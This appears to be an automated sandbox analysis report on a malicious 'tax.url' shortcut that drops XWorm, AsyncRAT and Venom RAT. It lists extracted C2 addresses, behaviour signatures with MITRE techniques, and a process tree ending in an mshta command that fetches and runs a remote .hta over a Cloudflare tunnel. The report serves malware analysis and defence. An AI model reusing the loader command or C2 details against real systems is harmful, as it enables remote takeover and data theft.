asyncrat | e865c11a09f20f23f2e4db2f432bae3d9c504e76f4c6211a761152bb8e58c2ba

Analysis

max time kernel
484s
max time network
485s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
20/02/2025, 18:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tax.url
Size

164B
MD5

723aac9b3e0f882ec7b82dff9baddcf5
SHA1

52b2dc535388d53584d2d71ab07a81c07b9ed88e
SHA256

66144c2c65f050cb23aae78416d596aa411aea6bdaec123b998061b9059661b9
SHA512

db169bcf3ee28196ac7a02024aaf15419036f305a84a8581297a4df3736b6af6536e98ec64e17ab2b6149eb062a181505afade4a78c3b30b629d92c3d3a85760

Score

10^/10

asyncrat stealerium xworm default collection discovery execution persistence privilege_escalation rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

62.60.190.196:8000

Mutex

9Kl9naWliCNlyild

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Botnet

Default

62.60.190.196:3232

62.60.190.141:3232

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

62.60.190.141:4056

Mutex

fagpetngyrfkiki

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/5776-1626-0x0000000002C60000-0x0000000002C6E000-memory.dmp	family_xworm

Stealerium
An open source info stealer written in C# first seen in May 2022.
stealer stealerium
Stealerium family
stealerium

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 5948 created 3468	5948	python.exe	56
PID 208 created 3468	208	python.exe	56
PID 2376 created 3468	2376	python.exe	56
PID 2448 created 3468	2448	python.exe	56

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 3 IoCs

rat

resource	yara_rule
behavioral1/memory/5100-1630-0x0000000002C50000-0x0000000002C66000-memory.dmp	family_asyncrat
behavioral1/memory/4200-1634-0x0000014C22EB0000-0x0000014C22EC8000-memory.dmp	family_asyncrat
behavioral1/memory/2068-1638-0x0000020CE8DE0000-0x0000020CE8DF6000-memory.dmp	family_asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
167	644	powershell.exe
169	2772	powershell.exe
183	5512	powershell.exe
209	2128	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5376	powershell.exe
2772	powershell.exe
2128	powershell.exe
2772	powershell.exe
5512	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	rundll32.exe

Executes dropped EXE 5 IoCs

pid	Process
5392	python.exe
5948	python.exe
208	python.exe
2376	python.exe
2448	python.exe

Loads dropped DLL 30 IoCs

pid	Process
5392	python.exe
5392	python.exe
5948	python.exe
5948	python.exe
5948	python.exe
5948	python.exe
5948	python.exe
5948	python.exe
5948	python.exe
208	python.exe
208	python.exe
208	python.exe
208	python.exe
208	python.exe
208	python.exe
208	python.exe
2376	python.exe
2376	python.exe
2376	python.exe
2376	python.exe
2376	python.exe
2376	python.exe
2376	python.exe
2448	python.exe
2448	python.exe
2448	python.exe
2448	python.exe
2448	python.exe
2448	python.exe
2448	python.exe

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
216	icanhazip.com
220	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5716	cmd.exe
5892	netsh.exe
5472	cmd.exe
5204	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	notepad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	explorer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	notepad.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Tax-Docuement-2024.pdf.lnk.download:Zone.Identifier	firefox.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5432	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4672	sdiagnhost.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
644	powershell.exe
644	powershell.exe
644	powershell.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4636	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
532	msedge.exe
532	msedge.exe
1316	msedge.exe
1316	msedge.exe
5948	python.exe
208	python.exe
2376	python.exe
2448	python.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	4672	sdiagnhost.exe
Token: SeDebugPrivilege	2468	firefox.exe
Token: SeDebugPrivilege	2468	firefox.exe
Token: SeDebugPrivilege	2468	firefox.exe
Token: SeDebugPrivilege	4636	taskmgr.exe
Token: SeSystemProfilePrivilege	4636	taskmgr.exe
Token: SeCreateGlobalPrivilege	4636	taskmgr.exe
Token: SeDebugPrivilege	644	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	2468	firefox.exe
Token: SeDebugPrivilege	2468	firefox.exe
Token: SeDebugPrivilege	2468	firefox.exe
Token: SeDebugPrivilege	5376	powershell.exe
Token: SeDebugPrivilege	2468	firefox.exe
Token: SeDebugPrivilege	5512	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	5776	explorer.exe
Token: SeDebugPrivilege	5100	explorer.exe
Token: SeDebugPrivilege	4200	notepad.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	2068	notepad.exe
Token: SeDebugPrivilege	2468	firefox.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4344	msdt.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
2468	firefox.exe
2468	firefox.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
4636	taskmgr.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
2468	firefox.exe
4200	notepad.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4584 wrote to memory of 3212	4584	rundll32.exe	90
PID 4584 wrote to memory of 3212	4584	rundll32.exe	90
PID 3212 wrote to memory of 4344	3212	rundll32.exe	91
PID 3212 wrote to memory of 4344	3212	rundll32.exe	91
PID 4672 wrote to memory of 548	4672	sdiagnhost.exe	94
PID 4672 wrote to memory of 548	4672	sdiagnhost.exe	94
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 4840 wrote to memory of 2468	4840	firefox.exe	105
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4908	2468	firefox.exe	106
PID 2468 wrote to memory of 4140	2468	firefox.exe	107
PID 2468 wrote to memory of 4140	2468	firefox.exe	107

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3468
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\tax.url
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing C:\Users\Admin\AppData\Local\Temp\NDFD6E7.tmp
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3212
  - - C:\Windows\system32\msdt.exe
      -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDFD6E7.tmp" -ep "NetworkDiagnosticsSharing"
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:4344
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - NTFS ADS
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2468
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 27368 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b15d5e4-8973-4d76-a9ff-b7fe00e4aaed} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" gpu
      4⤵
      PID:4908
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2380 -prefMapHandle 2376 -prefsLen 27246 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac554a11-d692-4db8-8bbb-161962c5ce2f} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" socket
      4⤵
      PID:4140
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2948 -childID 1 -isForBrowser -prefsHandle 2968 -prefMapHandle 2988 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a7263b0-8e93-4a70-afcc-965c57216843} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" tab
      4⤵
      PID:1936
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3844 -childID 2 -isForBrowser -prefsHandle 3840 -prefMapHandle 3836 -prefsLen 32620 -prefMapSize 244628 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32881a1b-e283-440a-9e94-bf940a64a85d} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" tab
      4⤵
      PID:4108
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4780 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4768 -prefMapHandle 4764 -prefsLen 32620 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6ee5bfd-d057-454f-bc48-f4fabdb16178} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" utility
      4⤵
      Checks processor information in registry
      PID:4664
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5216 -childID 3 -isForBrowser -prefsHandle 4772 -prefMapHandle 5184 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dcb7a65-04b1-4945-81e1-9b09470f5dd3} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" tab
      4⤵
      PID:4056
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5340 -childID 4 -isForBrowser -prefsHandle 5352 -prefMapHandle 5356 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fabe58cc-495c-4090-8c4c-9b56a6e3de33} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" tab
      4⤵
      PID:2348
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5636 -childID 5 -isForBrowser -prefsHandle 5556 -prefMapHandle 5564 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3edeee73-954b-46bd-8485-09c72f71d3cf} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" tab
      4⤵
      PID:2580
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6244 -childID 6 -isForBrowser -prefsHandle 6236 -prefMapHandle 6220 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {84f86606-7df2-4967-96c7-b83b6d0781e9} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" tab
      4⤵
      PID:5048
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6852 -childID 7 -isForBrowser -prefsHandle 4768 -prefMapHandle 5376 -prefsLen 28174 -prefMapSize 244628 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5ae42b0-c567-415d-b03c-99fe5388bec8} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" tab
      4⤵
      PID:4720
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 8 -isForBrowser -prefsHandle 6692 -prefMapHandle 2752 -prefsLen 28174 -prefMapSize 244628 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2038b81e-4112-4631-ab08-c2d8a97fd064} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" tab
      4⤵
      PID:5032
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5624 -childID 9 -isForBrowser -prefsHandle 6876 -prefMapHandle 6872 -prefsLen 28174 -prefMapSize 244628 -jsInitHandle 1312 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {484bdb84-dabd-46ce-bf38-64f653402ae9} 2468 "\\.\pipe\gecko-crash-server-pipe.2468" tab
      4⤵
      PID:5580
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "\\retained-gzip-hat-four.trycloudflare.com@SSL\DavWWWRoot\12.hta"
  2⤵
